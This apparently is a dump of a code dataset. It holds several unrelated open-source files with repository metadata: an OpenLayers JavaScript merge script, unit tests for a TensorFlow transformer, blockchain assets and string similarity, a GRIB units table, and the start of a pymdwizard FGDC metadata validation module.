# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re, os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def read(self, filename):
"""
Parses the content of the named file and stores the values.
:param filename: the path to a configuration file
:return none
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
outputFilename = sys.argv[0]
sourceDirectory = sys.argv[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
| 32.707113
| 102
| 0.612639
|
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re, os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, **kwargs):
self.forceFirst = kwargs.get('forceFirst', [])
self.forceLast = kwargs.get('forceLast', [])
self.include = kwargs.get('include', [])
self.exclude = kwargs.get('exclude', [])
def read(self, filename):
"""
Parses the content of the named file and stores the values.
:param filename: the path to a configuration file
:return none
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
outputFilename = sys.argv[0]
sourceDirectory = sys.argv[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
| 214
| 0
| 31
|
37506a8286c5b05402cb22c60eb6b8354ead4f28
| 5,955
|
py
|
Python
|
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | 1
|
2022-03-18T09:26:05.000Z
|
2022-03-18T09:26:05.000Z
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
import random
import tensorflow as tf
| 34.224138
| 87
| 0.674559
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
import random
import tensorflow as tf
def test_transformer_encoder_decoder_layer():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
target_seq_len = random.randint(10, 30)
num_heads = 2 ** random.randint(1, 4)
encoder_layer = transformer.EncoderLayer(d_model, num_heads, dff)
encoder_layer_output = encoder_layer(
tf.random.uniform((batch_size, input_seq_len, d_model)), False, None
)
assert (batch_size, input_seq_len, d_model) == encoder_layer_output.shape
decoder_layer = transformer.DecoderLayer(d_model, num_heads, dff)
decoder_layer_output, _, _ = decoder_layer(
tf.random.uniform((batch_size, target_seq_len, d_model)),
encoder_layer_output,
False,
None,
None,
)
assert (batch_size, target_seq_len, d_model) == decoder_layer_output.shape
def test_transformer_encoder_decoder():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
maximum_position_encoding = random.randint(1024, 4096)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
encoder = transformer.Encoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
encoder_output = encoder(temp_input, training=False, mask=None)
assert encoder_output.shape == (batch_size, input_seq_len, d_model)
decoder = transformer.Decoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
target_vocab_size=target_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
output, attn = decoder(
temp_input,
enc_output=encoder_output,
training=False,
look_ahead_mask=None,
padding_mask=None,
)
assert output.shape == (batch_size, target_seq_len, d_model)
assert len(attn.keys()) == 2
def test_transformer_positional_encoding():
maximum_position_encoding = random.randint(1024, 4096)
d_model = 2 ** random.randint(7, 9)
pos_encoding = transformer._positional_encoding(maximum_position_encoding, d_model)
assert pos_encoding.shape == (1, maximum_position_encoding, d_model)
def test_transformer_scaled_dot_product_attention():
# Both K and V penultimate dimension must match
# Both K and Q leading dimension must mathc
temp_k = tf.constant(
[[10, 0, 0], [0, 10, 0], [0, 0, 10], [0, 0, 10]], dtype=tf.float32
) # (4, 3)
temp_v = tf.constant(
[[1, 0], [10, 0], [100, 5], [1000, 6]], dtype=tf.float32
) # (4, 2)
# This `query` aligns with the second `key`,
# so the second `value` is returned.
temp_q = tf.constant([[0, 10, 0]], dtype=tf.float32) # (1, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
temp_q = tf.constant(
[[0, 0, 10], [0, 10, 0], [10, 10, 0]], dtype=tf.float32
) # (3, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
def test_multi_head_attention():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
encoder_sequence = random.randint(50, 100)
num_heads = 2 ** random.randint(1, 4)
temp_mha = transformer.MultiHeadAttention(d_model=d_model, num_heads=num_heads)
y = tf.random.uniform(
(batch_size, encoder_sequence, d_model)
) # (batch_size, encoder_sequence, d_model)
out, attn = temp_mha(y, k=y, q=y, mask=None)
assert out.shape == y.shape
assert attn.shape == (y.shape[0], num_heads, y.shape[1], y.shape[1])
def test_transformer_model():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
sample_transformer = transformer.Transformer(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
target_vocab_size=target_vocab_size,
pe_input=random.randint(5000, 10000),
pe_target=random.randint(2000, 4000),
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
temp_target = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
fn_out, _ = sample_transformer([temp_input, temp_target], training=False)
assert fn_out.shape == (batch_size, target_seq_len, target_vocab_size)
def test_optimizer():
d_model = 2 ** random.randint(7, 9)
optimizer = transformer.optimizer(d_model)
assert optimizer is not None
| 5,656
| 0
| 161
|
e2ec933ae2e853f380dc429a8199678745d149a0
| 454
|
py
|
Python
|
tests/core/test_asset.py
|
BlockGeeks0x01/py-asimov
|
5490b90bd5f47d48a69aa4de3b13c60039b2603f
|
[
"MIT"
] | null | null | null |
tests/core/test_asset.py
|
BlockGeeks0x01/py-asimov
|
5490b90bd5f47d48a69aa4de3b13c60039b2603f
|
[
"MIT"
] | null | null | null |
tests/core/test_asset.py
|
BlockGeeks0x01/py-asimov
|
5490b90bd5f47d48a69aa4de3b13c60039b2603f
|
[
"MIT"
] | null | null | null |
from unittest.mock import Mock
from asimov import Asset, constant
| 28.375
| 68
| 0.742291
|
from unittest.mock import Mock
from asimov import Asset, constant
def test_asset():
assert Asset.asset_wrapper(0, 1, 1) == 4294967297
assert Asset.asset2str(4294967297) == '000000000000000100000001'
mock_contract = Mock()
mock_contract.read.return_value = 1
new_asset = Asset(mock_contract, 0, 1)
print(new_asset)
assert new_asset.asset_id_int == 4294967297
assert new_asset.asset_id_str == '000000000000000100000001'
| 363
| 0
| 23
|
6052fd4f4ec0f135719d466deae94ed26256b6cc
| 2,471
|
py
|
Python
|
datamatch/test_similarities.py
|
pckhoi/datamatch
|
3d279293ff9bec84f383133090863db1307a3a68
|
[
"MIT"
] | 2
|
2021-05-22T01:53:20.000Z
|
2021-05-25T01:15:35.000Z
|
datamatch/test_similarities.py
|
pckhoi/datamatch
|
3d279293ff9bec84f383133090863db1307a3a68
|
[
"MIT"
] | 3
|
2021-05-10T03:27:51.000Z
|
2021-06-10T09:50:07.000Z
|
datamatch/test_similarities.py
|
pckhoi/datamatch
|
3d279293ff9bec84f383133090863db1307a3a68
|
[
"MIT"
] | null | null | null |
import unittest
from datetime import date
from datamatch.similarities import (
StringSimilarity, DateSimilarity, JaroWinklerSimilarity, AbsoluteNumericalSimilarity, RelativeNumericalSimilarity
)
| 39.222222
| 117
| 0.645488
|
import unittest
from datetime import date
from datamatch.similarities import (
StringSimilarity, DateSimilarity, JaroWinklerSimilarity, AbsoluteNumericalSimilarity, RelativeNumericalSimilarity
)
class TestStringSimilarity(unittest.TestCase):
def test_sim(self):
obj = StringSimilarity()
self.assertEqual(obj.sim("abc", "abc"), 1)
self.assertEqual(obj.sim("abc", "123"), 0)
self.assertEqual(obj.sim("abce", "abcd"), 0.75)
self.assertEqual(obj.sim("thang", "thăng"), 1)
class TestJaroWinklerSimilarity(unittest.TestCase):
def test_sim(self):
obj = JaroWinklerSimilarity(0.2)
self.assertEqual(obj.sim("abc", "abc"), 1)
self.assertEqual(obj.sim("abc", "123"), 0)
self.assertEqual(obj.sim("abce", "abcd"), 0.9333333333333333)
self.assertEqual(obj.sim("wbcd", "abcd"), 0.8333333333333334)
class TestDateSimilarity(unittest.TestCase):
def test_sim(self):
obj = DateSimilarity()
self.assertEqual(obj.sim(date(2000, 10, 11), date(2000, 10, 11)), 1)
# within 30 days difference
self.assertEqual(obj.sim(date(2000, 10, 11), date(2000, 10, 5)), 0.8)
self.assertEqual(
obj.sim(date(2000, 10, 11), date(2000, 11, 5)), 0.16666666666666663)
# completely different days
self.assertEqual(obj.sim(date(2000, 10, 11), date(2001, 3, 15)), 0)
# day & month is swapped
self.assertEqual(obj.sim(date(2000, 9, 11), date(2000, 11, 9)), 0.5)
# same year and day but month is different
self.assertEqual(obj.sim(date(2000, 3, 20), date(2000, 8, 20)), 0.875)
class TestAbsoluteNumericalSimilarity(unittest.TestCase):
def test_sim(self):
obj = AbsoluteNumericalSimilarity(10)
self.assertEqual(obj.sim(10, 10), 1)
self.assertEqual(obj.sim(8.9, 8.9), 1)
self.assertEqual(obj.sim(10, 5), 0.5)
self.assertEqual(obj.sim(10, 15), 0.5)
self.assertEqual(obj.sim(8.2, 3.1), 0.49)
self.assertEqual(obj.sim(40, 10), 0)
class TestRelativeNumericalSimilarity(unittest.TestCase):
def test_sim(self):
obj = RelativeNumericalSimilarity(30)
self.assertEqual(obj.sim(10000, 10000), 1)
self.assertEqual(obj.sim(8.9, 8.9), 1)
self.assertEqual(obj.sim(10000, 8500), 0.5)
self.assertEqual(obj.sim(8500, 10000), 0.5)
self.assertEqual(obj.sim(8.2, 3.1), 0)
self.assertEqual(obj.sim(10000, 7000), 0)
| 1,872
| 150
| 245
|
4942b83f028a5746713b6d146dd0b18ef104db83
| 575
|
py
|
Python
|
pyeccodes/defs/grib1/localConcepts/ekmi/units_def.py
|
ecmwf/pyeccodes
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
[
"Apache-2.0"
] | 7
|
2020-04-14T09:41:17.000Z
|
2021-08-06T09:38:19.000Z
|
pyeccodes/defs/grib1/localConcepts/ekmi/units_def.py
|
ecmwf/pyeccodes
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
[
"Apache-2.0"
] | null | null | null |
pyeccodes/defs/grib1/localConcepts/ekmi/units_def.py
|
ecmwf/pyeccodes
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
[
"Apache-2.0"
] | 3
|
2020-04-30T12:44:48.000Z
|
2020-12-15T08:40:26.000Z
|
import pyeccodes.accessors as _
| 23.958333
| 62
| 0.596522
|
import pyeccodes.accessors as _
def load(h):
def wrapped(h):
table2Version = h.get_l('table2Version')
indicatorOfParameter = h.get_l('indicatorOfParameter')
if table2Version == 1 and indicatorOfParameter == 224:
return 'J kg**-1'
if table2Version == 1 and indicatorOfParameter == 225:
return 'J kg**-1'
if table2Version == 1 and indicatorOfParameter == 228:
return 'm s**-1'
if table2Version == 1 and indicatorOfParameter == 61:
return 'kg m**-2'
return wrapped
| 519
| 0
| 23
|
8e54067c74c3efbad693b3983718ac2e603e8a34
| 9,858
|
py
|
Python
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 53
|
2017-05-01T05:03:33.000Z
|
2022-03-13T04:49:15.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 109
|
2017-05-17T15:15:40.000Z
|
2022-03-24T21:12:45.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 17
|
2017-02-08T16:18:18.000Z
|
2021-01-28T19:38:09.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intented to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
str : date formated in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
| 33.993103
| 79
| 0.582674
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intented to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
